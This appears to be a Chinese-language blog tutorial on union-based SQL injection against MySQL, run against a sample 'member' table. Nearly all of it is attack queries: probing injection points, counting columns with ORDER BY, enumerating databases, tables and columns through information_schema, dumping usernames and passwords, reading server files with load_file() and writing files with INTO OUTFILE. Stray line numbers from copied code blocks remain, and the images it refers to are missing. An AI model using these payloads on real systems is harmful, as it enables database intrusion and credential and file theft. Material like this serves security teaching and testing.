SQL注入命令执行

member 表如下

查询数据库版本，数据库名字，用户名，操作系统

select * from member where id=-1 union select version(),database(),user(),@@version_compile_os;
1

判断注入点—报错查询

select * from member where id=1 and 1=1;
select * from member where id=1 and 1=2;
1
2

group_concat 查询

将查询的内容连在一起，列如

select group_concat(username,pw) from  member where id=1; 
1

limit 查询

limit 0,1指返回第一列;limit 1,1指返回第二列;limit 1,2 指显示从第二行开始，显示两列
如下图：

order by 查询字段数

当查询的字段数小于查询对象的字段数时，则返回正确；如大于时，则返回错误，如下图：

union 查询

查询数据库名字，这里字段数要与查询的第一个对象相同，（如例子中的要与member字段数相同）否则查询错误

select * from member where id=1 union select database(),1,2;
1

select * from member where id=1 union select database(),1,2,3;
1

select * from member where id=-1 union select database(),1,2,3;
1

查询结果为当前的数据库名字为mysql;

查询数据库名

在mysql5.0以上版本存在一个 information_schema的数据库，它记录着所有的数据库，表明，列名。

select * from member where id=-1 union select group_concat(schema_name),2,3,4 from information_schema.schemata;
1

查询mysql数据库下的表名

select * from member where id=-1 union select table_name,1,2,3 from information_schema.tables where table_schema='mysql';
1

select * from member where id=-1 union select table_name,1,2,3 from information_schema.tables where table_schema=database();
1

select * from member where id=-1 union select group_concat(table_name),1,2,3 from information_schema.tables where table_schema='mysql';
1

报错—列数不对

查询mysql数据库下的表名

select * from member where id=-1 union select group_concat(column_name),2 from information_schema.columns where table_name='goods_tb'
1

select * from member where id=-1 union select group_concat(column_name),2 from information_schema.columns where table_name='member'
1

查询具体数据

select * from member where id=-1 union select id,username,pw,sex from member;
1

跨当前数据库查询其他数据库的名字

列如当前数据库为mysql,要查询另一个数据库world 下的表city

select * from world.city;
1

load_file():读取函数

select * from member where id=-1 union select load_file('d:/text.txt'),2,3,4;
1

into outfile或iinto dumpfile:导出函数

select 'x' into outfile 'd:/filename.txt';
1